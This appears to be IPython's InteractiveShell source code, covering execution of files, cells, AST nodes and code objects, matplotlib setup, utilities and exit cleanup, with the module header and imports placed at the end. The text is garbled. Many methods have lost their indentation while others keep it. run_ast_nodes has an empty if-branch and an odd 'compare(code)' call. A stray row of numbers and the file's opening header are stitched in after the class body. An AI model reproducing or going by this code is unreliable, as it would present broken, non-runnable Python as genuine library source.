    def safe_execfile(self, fname, *where, exit_ignore=False, raise_exceptions=False, shell_futures=False):
        """A safe version of the builtin execfile().

        This version will never throw an exception, but instead print
        helpful error messages to the screen.  This only works on pure
        Python files with the .py extension.

        Parameters
        ----------
        fname : string
            The name of the file to be executed.
        where : tuple
            One or two namespaces, passed to execfile() as (globals,locals).
            If only one is given, it is passed as both.
        exit_ignore : bool (False)
            If True, then silence SystemExit for non-zero status (it is always
            silenced for zero status, as it is so common).
        raise_exceptions : bool (False)
            If True raise exceptions everywhere. Meant for testing.
        shell_futures : bool (False)
            If True, the code will share future statements with the interactive
            shell. It will both be affected by previous __future__ imports, and
            any __future__ imports in the code will affect the shell. If False,
            __future__ imports are not shared in either direction.
        """
        fname = os.path.abspath(os.path.expanduser(fname))

        # Make sure we can open the file
        try:
            with open(fname):
                pass
        except:
            warn('Could not open file <%s> for safe execution.' % fname)
            return

        # Find things also in current directory.  This is needed to mimic the
        # behavior of running a script from the system command line, where
        # Python inserts the script's directory into sys.path
        dname = os.path.dirname(fname)

        with prepended_to_syspath(dname), self.builtin_trap:
            try:
                # Pad `where` with None so a single namespace is used for
                # both globals and locals; extras beyond two are ignored.
                glob, loc = (where + (None, ))[:2]
                py3compat.execfile(
                    fname, glob, loc,
                    self.compile if shell_futures else None)
            except SystemExit as status:
                # If the call was made with 0 or None exit status (sys.exit(0)
                # or sys.exit() ), don't bother showing a traceback, as both of
                # these are considered normal by the OS:
                # > python -c'import sys;sys.exit(0)'; echo $?
                # 0
                # > python -c'import sys;sys.exit()'; echo $?
                # 0
                # For other exit status, we show the exception unless
                # explicitly silenced, but only in short form.
                if status.code:
                    if raise_exceptions:
                        raise
                    if not exit_ignore:
                        self.showtraceback(exception_only=True)
            except:
                if raise_exceptions:
                    raise
                # tb offset is 2 because we wrap execfile
                self.showtraceback(tb_offset=2)
    def safe_execfile_ipy(self, fname, shell_futures=False, raise_exceptions=False):
        """Like safe_execfile, but for .ipy or .ipynb files with IPython syntax.

        Parameters
        ----------
        fname : str
            The name of the file to execute.  The filename must have a
            .ipy or .ipynb extension.
        shell_futures : bool (False)
            If True, the code will share future statements with the interactive
            shell. It will both be affected by previous __future__ imports, and
            any __future__ imports in the code will affect the shell. If False,
            __future__ imports are not shared in either direction.
        raise_exceptions : bool (False)
            If True raise exceptions everywhere.  Meant for testing.
        """
        fname = os.path.abspath(os.path.expanduser(fname))

        # Make sure we can open the file
        try:
            with open(fname):
                pass
        except:
            warn('Could not open file <%s> for safe execution.' % fname)
            return

        # Find things also in current directory.  This is needed to mimic the
        # behavior of running a script from the system command line, where
        # Python inserts the script's directory into sys.path
        dname = os.path.dirname(fname)

        def get_cells():
            """generator for sequence of code blocks to run"""
            if fname.endswith('.ipynb'):
                # Notebook: run each code cell in order, skipping others.
                from nbformat import read
                nb = read(fname, as_version=4)
                if not nb.cells:
                    return
                for cell in nb.cells:
                    if cell.cell_type == 'code':
                        yield cell.source
            else:
                # .ipy script: the whole file is a single block.
                with open(fname) as f:
                    yield f.read()

        with prepended_to_syspath(dname):
            try:
                for cell in get_cells():
                    result = self.run_cell(cell, silent=True, shell_futures=shell_futures)
                    if raise_exceptions:
                        result.raise_error()
                    elif not result.success:
                        # Stop at the first failing cell when not re-raising.
                        break
            except:
                if raise_exceptions:
                    raise
                self.showtraceback()
                warn('Unknown failure executing file: <%s>' % fname)
def safe_run_module(self, mod_name, where):
"""A safe version of runpy.run_module().
This version will never throw an exception, but instead print
helpful error messages to the screen.
`SystemExit` exceptions with status code 0 or None are ignored.
Parameters
----------
mod_name : string
The name of the module to be executed.
where : dict
The globals namespace.
"""
try:
try:
where.update(
runpy.run_module(str(mod_name), run_name="__main__",
alter_sys=True)
)
except SystemExit as status:
if status.code:
raise
except:
self.showtraceback()
warn('Unknown failure executing module: <%s>' % mod_name)
def run_cell(self, raw_cell, store_history=False, silent=False, shell_futures=True):
"""Run a complete IPython cell.
Parameters
----------
raw_cell : str
The code (including IPython code such as %magic functions) to run.
store_history : bool
If True, the raw and translated cell will be stored in IPython's
history. For user code calling back into IPython's machinery, this
should be set to False.
silent : bool
If True, avoid side-effects, such as implicit displayhooks and
and logging. silent=True forces store_history=False.
shell_futures : bool
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
Returns
-------
result : :class:`ExecutionResult`
"""
result = None
try:
result = self._run_cell(
raw_cell, store_history, silent, shell_futures)
finally:
self.events.trigger('post_execute')
if not silent:
self.events.trigger('post_run_cell', result)
return result
    def _run_cell(self, raw_cell:str, store_history:bool, silent:bool, shell_futures:bool):
        """Internal method to run a complete IPython cell.

        Transforms the cell once, decides which coroutine runner to use,
        and drives :meth:`run_cell_async` to completion, returning its
        :class:`ExecutionResult` (or a synthetic error result if the runner
        itself raises).
        """
        # we need to avoid calling self.transform_cell multiple time on the same thing
        # so we need to store some results:
        preprocessing_exc_tuple = None
        try:
            transformed_cell = self.transform_cell(raw_cell)
        except Exception:
            # Keep the raw cell and remember the failure; run_cell_async will
            # report it after logging/history storage.
            transformed_cell = raw_cell
            preprocessing_exc_tuple = sys.exc_info()

        assert transformed_cell is not None
        coro = self.run_cell_async(
            raw_cell,
            store_history=store_history,
            silent=silent,
            shell_futures=shell_futures,
            transformed_cell=transformed_cell,
            preprocessing_exc_tuple=preprocessing_exc_tuple,
        )

        # run_cell_async is async, but may not actually need an eventloop.
        # when this is the case, we want to run it using the pseudo_sync_runner
        # so that code can invoke eventloops (for example via the %run , and
        # `%paste` magic.
        if self.trio_runner:
            runner = self.trio_runner
        elif self.should_run_async(
            raw_cell,
            transformed_cell=transformed_cell,
            preprocessing_exc_tuple=preprocessing_exc_tuple,
        ):
            runner = self.loop_runner
        else:
            runner = _pseudo_sync_runner

        try:
            return runner(coro)
        except BaseException as e:
            # The runner itself blew up: synthesize an ExecutionResult so
            # callers still get a well-formed return value.
            info = ExecutionInfo(raw_cell, store_history, silent, shell_futures)
            result = ExecutionResult(info)
            result.error_in_exec = e
            self.showtraceback(running_compiled_code=True)
            return result
        return  # NOTE: unreachable (both branches above return)
    def should_run_async(
        self, raw_cell: str, *, transformed_cell=None, preprocessing_exc_tuple=None
    ) -> bool:
        """Return whether a cell should be run asynchronously via a coroutine runner

        Parameters
        ----------
        raw_cell: str
            The code to be executed

        Returns
        -------
        result: bool
            Whether the code needs to be run with a coroutine runner or not

        .. versionadded: 7.0
        """
        # autoawait disabled: everything runs synchronously.
        if not self.autoawait:
            return False
        # A failed transform will be reported before execution; no need for
        # an async runner.
        if preprocessing_exc_tuple is not None:
            return False
        assert preprocessing_exc_tuple is None
        if transformed_cell is None:
            # Legacy call path: transform here ourselves (deprecated).
            warnings.warn(
                "`should_run_async` will not call `transform_cell`"
                " automatically in the future. Please pass the result to"
                " `transformed_cell` argument and any exception that happen"
                " during the"
                "transform in `preprocessing_exc_tuple` in"
                " IPython 7.17 and above.",
                DeprecationWarning,
                stacklevel=2,
            )
            try:
                cell = self.transform_cell(raw_cell)
            except Exception:
                # any exception during transform will be raised
                # prior to execution
                return False
        else:
            cell = transformed_cell
        return _should_be_async(cell)
async def run_cell_async(
self,
raw_cell: str,
store_history=False,
silent=False,
shell_futures=True,
*,
transformed_cell: Optional[str] = None,
preprocessing_exc_tuple: Optional[Any] = None
) -> ExecutionResult:
"""Run a complete IPython cell asynchronously.
Parameters
----------
raw_cell : str
The code (including IPython code such as %magic functions) to run.
store_history : bool
If True, the raw and translated cell will be stored in IPython's
history. For user code calling back into IPython's machinery, this
should be set to False.
silent : bool
If True, avoid side-effects, such as implicit displayhooks and
and logging. silent=True forces store_history=False.
shell_futures : bool
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
transformed_cell: str
cell that was passed through transformers
preprocessing_exc_tuple:
trace if the transformation failed.
Returns
-------
result : :class:`ExecutionResult`
.. versionadded: 7.0
"""
info = ExecutionInfo(
raw_cell, store_history, silent, shell_futures)
result = ExecutionResult(info)
if (not raw_cell) or raw_cell.isspace():
self.last_execution_succeeded = True
self.last_execution_result = result
return result
if silent:
store_history = False
if store_history:
result.execution_count = self.execution_count
self.events.trigger('pre_execute')
if not silent:
self.events.trigger('pre_run_cell', info)
if transformed_cell is None:
warnings.warn(
"`run_cell_async` will not call `transform_cell`"
" automatically in the future. Please pass the result to"
" `transformed_cell` argument and any exception that happen"
" during the"
"transform in `preprocessing_exc_tuple` in"
" IPython 7.17 and above.",
DeprecationWarning,
stacklevel=2,
)
# If any of our input transformation (input_transformer_manager or
# prefilter_manager) raises an exception, we store it in this variable
# so that we can display the error after logging the input and storing
# it in the history.
try:
cell = self.transform_cell(raw_cell)
except Exception:
preprocessing_exc_tuple = sys.exc_info()
cell = raw_cell # cell has to exist so it can be stored/logged
else:
preprocessing_exc_tuple = None
else:
if preprocessing_exc_tuple is None:
cell = transformed_cell
else:
cell = raw_cell
# Store raw and processed history
if store_history:
self.history_manager.store_inputs(self.execution_count,
cell, raw_cell)
if not silent:
self.logger.log(cell, raw_cell)
# Display the exception if input processing failed.
if preprocessing_exc_tuple is not None:
self.showtraceback(preprocessing_exc_tuple)
if store_history:
self.execution_count += 1
return error_before_exec(preprocessing_exc_tuple[1])
# Our own compiler remembers the __future__ environment. If we want to
# run code with a separate __future__ environment, use the default
# compiler
compiler = self.compile if shell_futures else self.compiler_class()
_run_async = False
with self.builtin_trap:
cell_name = self.compile.cache(
cell, self.execution_count, raw_code=raw_cell
)
with self.display_trap:
# Compile to bytecode
try:
if sys.version_info < (3,8) and self.autoawait:
if _should_be_async(cell):
# the code AST below will not be user code: we wrap it
# in an `async def`. This will likely make some AST
# transformer below miss some transform opportunity and
# introduce a small coupling to run_code (in which we
# bake some assumptions of what _ast_asyncify returns.
# they are ways around (like grafting part of the ast
# later:
# - Here, return code_ast.body[0].body[1:-1], as well
# as last expression in return statement which is
# the user code part.
# - Let it go through the AST transformers, and graft
# - it back after the AST transform
# But that seem unreasonable, at least while we
# do not need it.
code_ast = _ast_asyncify(cell, 'async-def-wrapper')
_run_async = True
else:
code_ast = compiler.ast_parse(cell, filename=cell_name)
else:
code_ast = compiler.ast_parse(cell, filename=cell_name)
except self.custom_exceptions as e:
etype, value, tb = sys.exc_info()
self.CustomTB(etype, value, tb)
return error_before_exec(e)
except IndentationError as e:
self.showindentationerror()
return error_before_exec(e)
except (OverflowError, SyntaxError, ValueError, TypeError,
MemoryError) as e:
self.showsyntaxerror()
return error_before_exec(e)
# Apply AST transformations
try:
code_ast = self.transform_ast(code_ast)
except InputRejected as e:
self.showtraceback()
return error_before_exec(e)
# Give the displayhook a reference to our ExecutionResult so it
# can fill in the output value.
self.displayhook.exec_result = result
# Execute the user code
interactivity = "none" if silent else self.ast_node_interactivity
if _run_async:
interactivity = 'async'
has_raised = await self.run_ast_nodes(code_ast.body, cell_name,
interactivity=interactivity, compiler=compiler, result=result)
self.last_execution_succeeded = not has_raised
self.last_execution_result = result
# Reset this so later displayed values do not modify the
# ExecutionResult
self.displayhook.exec_result = None
if store_history:
# Write output to the database. Does nothing unless
# history output logging is enabled.
self.history_manager.store_output(self.execution_count)
# Each cell is a *single* input, regardless of how many lines it has
self.execution_count += 1
return result
def transform_cell(self, raw_cell):
"""Transform an input cell before parsing it.
Static transformations, implemented in IPython.core.inputtransformer2,
deal with things like ``%magic`` and ``!system`` commands.
These run on all input.
Dynamic transformations, for things like unescaped magics and the exit
autocall, depend on the state of the interpreter.
These only apply to single line inputs.
These string-based transformations are followed by AST transformations;
see :meth:`transform_ast`.
"""
# Static input transformations
cell = self.input_transformer_manager.transform_cell(raw_cell)
if len(cell.splitlines()) == 1:
# Dynamic transformations - only applied for single line commands
with self.builtin_trap:
# use prefilter_lines to handle trailing newlines
# restore trailing newline for ast.parse
cell = self.prefilter_manager.prefilter_lines(cell) + '\n'
lines = cell.splitlines(keepends=True)
for transform in self.input_transformers_post:
lines = transform(lines)
cell = ''.join(lines)
return cell
def transform_ast(self, node):
"""Apply the AST transformations from self.ast_transformers
Parameters
----------
node : ast.Node
The root node to be transformed. Typically called with the ast.Module
produced by parsing user input.
Returns
-------
An ast.Node corresponding to the node it was called with. Note that it
may also modify the passed object, so don't rely on references to the
original AST.
"""
for transformer in self.ast_transformers:
try:
node = transformer.visit(node)
except InputRejected:
# User-supplied AST transformers can reject an input by raising
# an InputRejected. Short-circuit in this case so that we
# don't unregister the transform.
raise
except Exception:
warn("AST transformer %r threw an error. It will be unregistered." % transformer)
self.ast_transformers.remove(transformer)
if self.ast_transformers:
ast.fix_missing_locations(node)
return node
async def run_ast_nodes(self, nodelist:ListType[AST], cell_name:str, interactivity='last_expr',
compiler=compile, result=None):
"""Run a sequence of AST nodes. The execution mode depends on the
interactivity parameter.
Parameters
----------
nodelist : list
A sequence of AST nodes to run.
cell_name : str
Will be passed to the compiler as the filename of the cell. Typically
the value returned by ip.compile.cache(cell).
interactivity : str
'all', 'last', 'last_expr' , 'last_expr_or_assign' or 'none',
specifying which nodes should be run interactively (displaying output
from expressions). 'last_expr' will run the last node interactively
only if it is an expression (i.e. expressions in loops or other blocks
are not displayed) 'last_expr_or_assign' will run the last expression
or the last assignment. Other values for this parameter will raise a
ValueError.
Experimental value: 'async' Will try to run top level interactive
async/await code in default runner, this will not respect the
interactivity setting and will only run the last node if it is an
expression.
compiler : callable
A function with the same interface as the built-in compile(), to turn
the AST nodes into code objects. Default is the built-in compile().
result : ExecutionResult, optional
An object to store exceptions that occur during execution.
Returns
-------
True if an exception occurred while running code, False if it finished
running.
"""
if not nodelist:
return
if interactivity == 'last_expr_or_assign':
if isinstance(nodelist[-1], _assign_nodes):
asg = nodelist[-1]
if isinstance(asg, ast.Assign) and len(asg.targets) == 1:
target = asg.targets[0]
elif isinstance(asg, _single_targets_nodes):
target = asg.target
else:
target = None
if isinstance(target, ast.Name):
nnode = ast.Expr(ast.Name(target.id, ast.Load()))
ast.fix_missing_locations(nnode)
nodelist.append(nnode)
interactivity = 'last_expr'
_async = False
if interactivity == 'last_expr':
if isinstance(nodelist[-1], ast.Expr):
interactivity = "last"
else:
interactivity = "none"
if interactivity == 'none':
to_run_exec, to_run_interactive = nodelist, []
elif interactivity == 'last':
to_run_exec, to_run_interactive = nodelist[:-1], nodelist[-1:]
elif interactivity == 'all':
to_run_exec, to_run_interactive = [], nodelist
elif interactivity == 'async':
to_run_exec, to_run_interactive = [], nodelist
_async = True
else:
raise ValueError("Interactivity was %r" % interactivity)
try:
if _async and sys.version_info > (3,8):
raise ValueError("This branch should never happen on Python 3.8 and above, "
"please try to upgrade IPython and open a bug report with your case.")
if _async:
# If interactivity is async the semantics of run_code are
# completely different Skip usual machinery.
mod = Module(nodelist, [])
async_wrapper_code = compiler(mod, cell_name, 'exec')
exec(async_wrapper_code, self.user_global_ns, self.user_ns)
async_code = removed_co_newlocals(self.user_ns.pop('async-def-wrapper')).__code__
if (await self.run_code(async_code, result, async_=True)):
return True
else:
if sys.version_info > (3, 8):
else:
# refactor that to just change the mod constructor.
to_run = []
for node in to_run_exec:
to_run.append((node, 'exec'))
for node in to_run_interactive:
to_run.append((node, 'single'))
for node,mode in to_run:
if mode == 'exec':
mod = Module([node], [])
elif mode == 'single':
mod = ast.Interactive([node])
with compiler.extra_flags(getattr(ast, 'PyCF_ALLOW_TOP_LEVEL_AWAIT', 0x0) if self.autoawait else 0x0):
code = compiler(mod, cell_name, mode)
asy = compare(code)
if (await self.run_code(code, result, async_=asy)):
return True
# Flush softspace
if softspace(sys.stdout, 0):
print()
except:
# It's possible to have exceptions raised here, typically by
# compilation of odd code (such as a naked 'return' outside a
# function) that did parse but isn't valid. Typically the exception
# is a SyntaxError, but it's safest just to catch anything and show
# the user a traceback.
# We do only one try/except outside the loop to minimize the impact
# on runtime, and also because if any node in the node list is
# broken, we should stop execution completely.
if result:
result.error_before_exec = sys.exc_info()[1]
self.showtraceback()
return True
return False
def _async_exec(self, code_obj: types.CodeType, user_ns: dict):
"""
Evaluate an asynchronous code object using a code runner
Fake asynchronous execution of code_object in a namespace via a proxy namespace.
Returns coroutine object, which can be executed via async loop runner
WARNING: The semantics of `async_exec` are quite different from `exec`,
in particular you can only pass a single namespace. It also return a
handle to the value of the last things returned by code_object.
"""
return eval(code_obj, user_ns)
    async def run_code(self, code_obj, result=None, *, async_=False):
        """Execute a code object.

        When an exception occurs, self.showtraceback() is called to display a
        traceback.

        Parameters
        ----------
        code_obj : code object
            A compiled code object, to be executed
        result : ExecutionResult, optional
            An object to store exceptions that occur during execution.
        async_ :  Bool (Experimental)
            Attempt to run top-level asynchronous code in a default loop.

        Returns
        -------
        False : successful execution.
        True : an error occurred.
        """
        # special value to say that anything above is IPython and should be
        # hidden.
        __tracebackhide__ = "__ipython_bottom__"
        # Set our own excepthook in case the user code tries to call it
        # directly, so that the IPython crash handler doesn't get triggered
        old_excepthook, sys.excepthook = sys.excepthook, self.excepthook

        # we save the original sys.excepthook in the instance, in case config
        # code (such as magics) needs access to it.
        self.sys_excepthook = old_excepthook
        outflag = True  # happens in more places, so it's easier as default
        try:
            try:
                self.hooks.pre_run_code_hook()
                if async_ and sys.version_info < (3,8):
                    # Legacy async path: await the wrapped coroutine, then
                    # display its value through a tiny 'single'-mode stub.
                    last_expr = (await self._async_exec(code_obj, self.user_ns))
                    code = compile('last_expr', 'fake', "single")
                    exec(code, {'last_expr': last_expr})
                elif async_ :
                    # 3.8+: code compiled with PyCF_ALLOW_TOP_LEVEL_AWAIT
                    # evaluates to an awaitable.
                    await eval(code_obj, self.user_global_ns, self.user_ns)
                else:
                    exec(code_obj, self.user_global_ns, self.user_ns)
            finally:
                # Reset our crash handler in place
                sys.excepthook = old_excepthook
        except SystemExit as e:
            if result is not None:
                result.error_in_exec = e
            self.showtraceback(exception_only=True)
            warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1)
        except self.custom_exceptions:
            etype, value, tb = sys.exc_info()
            if result is not None:
                result.error_in_exec = value
            self.CustomTB(etype, value, tb)
        except:
            if result is not None:
                result.error_in_exec = sys.exc_info()[1]
            self.showtraceback(running_compiled_code=True)
        else:
            outflag = False
        return outflag
# For backwards compatibility
runcode = run_code
def check_complete(self, code: str) -> Tuple[str, str]:
"""Return whether a block of code is ready to execute, or should be continued
Parameters
----------
source : string
Python input code, which can be multiline.
Returns
-------
status : str
One of 'complete', 'incomplete', or 'invalid' if source is not a
prefix of valid code.
indent : str
When status is 'incomplete', this is some whitespace to insert on
the next line of the prompt.
"""
status, nspaces = self.input_transformer_manager.check_complete(code)
return status, ' ' * (nspaces or 0)
#-------------------------------------------------------------------------
# Things related to GUI support and pylab
#-------------------------------------------------------------------------
active_eventloop = None
    def enable_matplotlib(self, gui=None):
        """Enable interactive matplotlib and inline figure support.

        This takes the following steps:

        1. select the appropriate eventloop and matplotlib backend
        2. set up matplotlib for interactive use with that backend
        3. configure formatters for inline figure display
        4. enable the selected gui eventloop

        Parameters
        ----------
        gui : optional, string
            If given, dictates the choice of matplotlib GUI backend to use
            (should be one of IPython's supported backends, 'qt', 'osx', 'tk',
            'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
            matplotlib (as dictated by the matplotlib build-time options plus the
            user's matplotlibrc configuration file).  Note that not all backends
            make sense in all contexts, for example a terminal ipython can't
            display figures inline.

        Returns
        -------
        gui : str
            The GUI toolkit that was selected.
        backend : str
            The matplotlib backend that was activated.
        """
        # Deferred import: matplotlib support is optional.
        from IPython.core import pylabtools as pt
        gui, backend = pt.find_gui_and_backend(gui, self.pylab_gui_select)
        if gui != 'inline':
            # If we have our first gui selection, store it
            if self.pylab_gui_select is None:
                self.pylab_gui_select = gui
            # Otherwise if they are different: only one GUI toolkit can be
            # active per process, so keep the original choice and warn.
            elif gui != self.pylab_gui_select:
                print('Warning: Cannot change to a different GUI toolkit: %s.'
                        ' Using %s instead.' % (gui, self.pylab_gui_select))
                gui, backend = pt.find_gui_and_backend(self.pylab_gui_select)
        # Activate the backend before configuring inline support, which
        # depends on the backend already being in place.
        pt.activate_matplotlib(backend)
        pt.configure_inline_support(self, backend)
        # Now we must activate the gui pylab wants to use, and fix %run to take
        # plot updates into account
        self.enable_gui(gui)
        self.magics_manager.registry['ExecutionMagics'].default_runner = \
            pt.mpl_runner(self.safe_execfile)
        return gui, backend
def enable_pylab(self, gui=None, import_all=True, welcome_message=False):
"""Activate pylab support at runtime.
This turns on support for matplotlib, preloads into the interactive
namespace all of numpy and pylab, and configures IPython to correctly
interact with the GUI event loop. The GUI backend to be used can be
optionally selected with the optional ``gui`` argument.
This method only adds preloading the namespace to InteractiveShell.enable_matplotlib.
Parameters
----------
gui : optional, string
If given, dictates the choice of matplotlib GUI backend to use
(should be one of IPython's supported backends, 'qt', 'osx', 'tk',
'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
matplotlib (as dictated by the matplotlib build-time options plus the
user's matplotlibrc configuration file). Note that not all backends
make sense in all contexts, for example a terminal ipython can't
display figures inline.
import_all : optional, bool, default: True
Whether to do `from numpy import *` and `from pylab import *`
in addition to module imports.
welcome_message : deprecated
This argument is ignored, no welcome message will be displayed.
"""
from IPython.core.pylabtools import import_pylab
gui, backend = self.enable_matplotlib(gui)
# We want to prevent the loading of pylab to pollute the user's
# namespace as shown by the %who* magics, so we execute the activation
# code in an empty namespace, and we update *both* user_ns and
# user_ns_hidden with this information.
ns = {}
import_pylab(ns, import_all)
# warn about clobbered names
ignored = {"__builtins__"}
both = set(ns).intersection(self.user_ns).difference(ignored)
clobbered = [ name for name in both if self.user_ns[name] is not ns[name] ]
self.user_ns.update(ns)
self.user_ns_hidden.update(ns)
return gui, backend, clobbered
#-------------------------------------------------------------------------
# Utilities
#-------------------------------------------------------------------------
def var_expand(self, cmd, depth=0, formatter=DollarFormatter()):
"""Expand python variables in a string.
The depth argument indicates how many frames above the caller should
be walked to look for the local namespace where to expand variables.
The global namespace for expansion is always the user's interactive
namespace.
"""
ns = self.user_ns.copy()
try:
frame = sys._getframe(depth+1)
except ValueError:
# This is thrown if there aren't that many frames on the stack,
# e.g. if a script called run_line_magic() directly.
pass
else:
ns.update(frame.f_locals)
try:
# We have to use .vformat() here, because 'self' is a valid and common
# name, and expanding **ns for .format() would make it collide with
# the 'self' argument of the method.
cmd = formatter.vformat(cmd, args=[], kwargs=ns)
except Exception:
# if formatter couldn't format, just let it go untransformed
pass
return cmd
def mktempfile(self, data=None, prefix='ipython_edit_'):
"""Make a new tempfile and return its filename.
This makes a call to tempfile.mkstemp (created in a tempfile.mkdtemp),
but it registers the created filename internally so ipython cleans it up
at exit time.
Optional inputs:
- data(None): if data is given, it gets written out to the temp file
immediately, and the file is closed again."""
dirname = tempfile.mkdtemp(prefix=prefix)
self.tempdirs.append(dirname)
handle, filename = tempfile.mkstemp('.py', prefix, dir=dirname)
os.close(handle) # On Windows, there can only be one open handle on a file
self.tempfiles.append(filename)
if data:
with open(filename, 'w') as tmp_file:
tmp_file.write(data)
return filename
    @undoc
    def write(self,data):
        """DEPRECATED: Write a string to the default output"""
        # Backwards-compatibility shim only: warn, then forward to stdout.
        warn('InteractiveShell.write() is deprecated, use sys.stdout instead',
             DeprecationWarning, stacklevel=2)
        sys.stdout.write(data)
    @undoc
    def write_err(self,data):
        """DEPRECATED: Write a string to the default error output"""
        # Backwards-compatibility shim only: warn, then forward to stderr.
        warn('InteractiveShell.write_err() is deprecated, use sys.stderr instead',
             DeprecationWarning, stacklevel=2)
        sys.stderr.write(data)
    def show_usage(self):
        """Show a usage message"""
        # Display IPython's interactive usage text through the pager.
        page.page(IPython.core.usage.interactive_usage)
def extract_input_lines(self, range_str, raw=False):
"""Return as a string a set of input history slices.
Parameters
----------
range_str : string
The set of slices is given as a string, like "~5/6-~4/2 4:8 9",
since this function is for use by magic functions which get their
arguments as strings. The number before the / is the session
number: ~n goes n back from the current session.
raw : bool, optional
By default, the processed input is used. If this is true, the raw
input history is used instead.
Notes
-----
Slices can be described with two notations:
* ``N:M`` -> standard python form, means including items N...(M-1).
* ``N-M`` -> include items N..M (closed endpoint).
"""
lines = self.history_manager.get_range_by_str(range_str, raw=raw)
return "\n".join(x for _, _, x in lines)
    def find_user_code(self, target, raw=True, py_only=False, skip_encoding_cookie=True, search_ns=False):
        """Get a code string from history, file, url, or a string or macro.

        This is mainly used by magic functions.

        Parameters
        ----------
        target : str
            A string specifying code to retrieve. This will be tried respectively
            as: ranges of input history (see %history for syntax), url,
            corresponding .py file, filename, or an expression evaluating to a
            string or Macro in the user namespace.
        raw : bool
            If true (default), retrieve raw history. Has no effect on the other
            retrieval mechanisms.
        py_only : bool (default False)
            Only try to fetch python code, do not try alternative methods to decode file
            if unicode fails.
        skip_encoding_cookie : bool (default True)
            Whether to strip the encoding declaration when reading code from a
            url or a file.
        search_ns : bool (default False)
            If true, also try to extract an object's source from the user
            namespace (via ``object_inspect``) before falling back to eval.

        Returns
        -------
        A string of code.

        ValueError is raised if nothing is found, and TypeError if it evaluates
        to an object of another type. In each case, .args[0] is a printable
        message.
        """
        code = self.extract_input_lines(target, raw=raw)  # Grab history
        if code:
            return code
        try:
            # URL source: fetch the page as python code.
            if target.startswith(('http://', 'https://')):
                return openpy.read_py_url(target, skip_encoding_cookie=skip_encoding_cookie)
        except UnicodeDecodeError:
            if not py_only :
                # Deferred import
                from urllib.request import urlopen
                response = urlopen(target)
                # Retry as latin1, which can decode any byte sequence.
                return response.read().decode('latin1')
            raise ValueError(("'%s' seem to be unreadable.") % target)
        # File source: try both `target` and its .py-resolved form, with the
        # resolved form taking priority.
        potential_target = [target]
        try :
            potential_target.insert(0,get_py_filename(target))
        except IOError:
            pass
        for tgt in potential_target :
            if os.path.isfile(tgt):  # Read file
                try :
                    return openpy.read_py_file(tgt, skip_encoding_cookie=skip_encoding_cookie)
                except UnicodeDecodeError :
                    if not py_only :
                        # Retry as latin1, which can decode any byte sequence.
                        with io_open(tgt,'r', encoding='latin1') as f :
                            return f.read()
                    raise ValueError(("'%s' seem to be unreadable.") % target)
            elif os.path.isdir(os.path.expanduser(tgt)):
                raise ValueError("'%s' is a directory, not a regular file." % target)
        if search_ns:
            # Inspect namespace to load object source
            object_info = self.object_inspect(target, detail_level=1)
            if object_info['found'] and object_info['source']:
                return object_info['source']
        try:  # User namespace: evaluate target as a python expression.
            codeobj = eval(target, self.user_ns)
        except Exception:
            raise ValueError(("'%s' was not found in history, as a file, url, "
                                "nor in the user namespace.") % target)
        if isinstance(codeobj, str):
            return codeobj
        elif isinstance(codeobj, Macro):
            return codeobj.value
        raise TypeError("%s is neither a string nor a macro." % target,
                        codeobj)
#-------------------------------------------------------------------------
# Things related to IPython exiting
#-------------------------------------------------------------------------
def atexit_operations(self):
"""This will be executed at the time of exit.
Cleanup operations and saving of persistent data that is done
unconditionally by IPython should be performed here.
For things that may depend on startup flags or platform specifics (such
as having readline or not), register a separate atexit function in the
code that has the appropriate information, rather than trying to
clutter
"""
# Close the history session (this stores the end time and line count)
# this must be *before* the tempfile cleanup, in case of temporary
# history db
self.history_manager.end_session()
# Cleanup all tempfiles and folders left around
for tfile in self.tempfiles:
try:
os.unlink(tfile)
except OSError:
pass
for tdir in self.tempdirs:
try:
os.rmdir(tdir)
except OSError:
pass
# Clear all user namespaces to release all references cleanly.
self.reset(new_session=False)
# Run user hooks
self.hooks.shutdown_hook()
# Overridden in terminal subclass to change prompts
class InteractiveShellABC(metaclass=abc.ABCMeta):
    """An abstract base class for InteractiveShell."""

# Register the concrete class as a virtual subclass so that
# isinstance(shell, InteractiveShellABC) checks succeed without inheritance.
InteractiveShellABC.register(InteractiveShell)
| 40.236911 | 147 | 0.592076 | # -*- coding: utf-8 -*-
"""Main IPython class."""
#-----------------------------------------------------------------------------
# Copyright (C) 2001 Janko Hauser <jhauser@zscout.de>
# Copyright (C) 2001-2007 Fernando Perez. <fperez@colorado.edu>
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import abc
import ast
import atexit
import builtins as builtin_mod
import functools
import inspect
import os
import re
import runpy
import sys
import tempfile
import traceback
import types
import subprocess
import warnings
from io import open as io_open
from pickleshare import PickleShareDB
from traitlets.config.configurable import SingletonConfigurable
from traitlets.utils.importstring import import_item
from IPython.core import oinspect
from IPython.core import magic
from IPython.core import page
from IPython.core import prefilter
from IPython.core import ultratb
from IPython.core.alias import Alias, AliasManager
from IPython.core.autocall import ExitAutocall
from IPython.core.builtin_trap import BuiltinTrap
from IPython.core.events import EventManager, available_events
from IPython.core.compilerop import CachingCompiler, check_linecache_ipython
from IPython.core.debugger import Pdb
from IPython.core.display_trap import DisplayTrap
from IPython.core.displayhook import DisplayHook
from IPython.core.displaypub import DisplayPublisher
from IPython.core.error import InputRejected, UsageError
from IPython.core.extensions import ExtensionManager
from IPython.core.formatters import DisplayFormatter
from IPython.core.history import HistoryManager
from IPython.core.inputtransformer2 import ESC_MAGIC, ESC_MAGIC2
from IPython.core.logger import Logger
from IPython.core.macro import Macro
from IPython.core.payload import PayloadManager
from IPython.core.prefilter import PrefilterManager
from IPython.core.profiledir import ProfileDir
from IPython.core.usage import default_banner
from IPython.display import display
from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import PyColorize
from IPython.utils import io
from IPython.utils import py3compat
from IPython.utils import openpy
from IPython.utils.decorators import undoc
from IPython.utils.io import ask_yes_no
from IPython.utils.ipstruct import Struct
from IPython.paths import get_ipython_dir
from IPython.utils.path import get_home_dir, get_py_filename, ensure_dir_exists
from IPython.utils.process import system, getoutput
from IPython.utils.strdispatch import StrDispatch
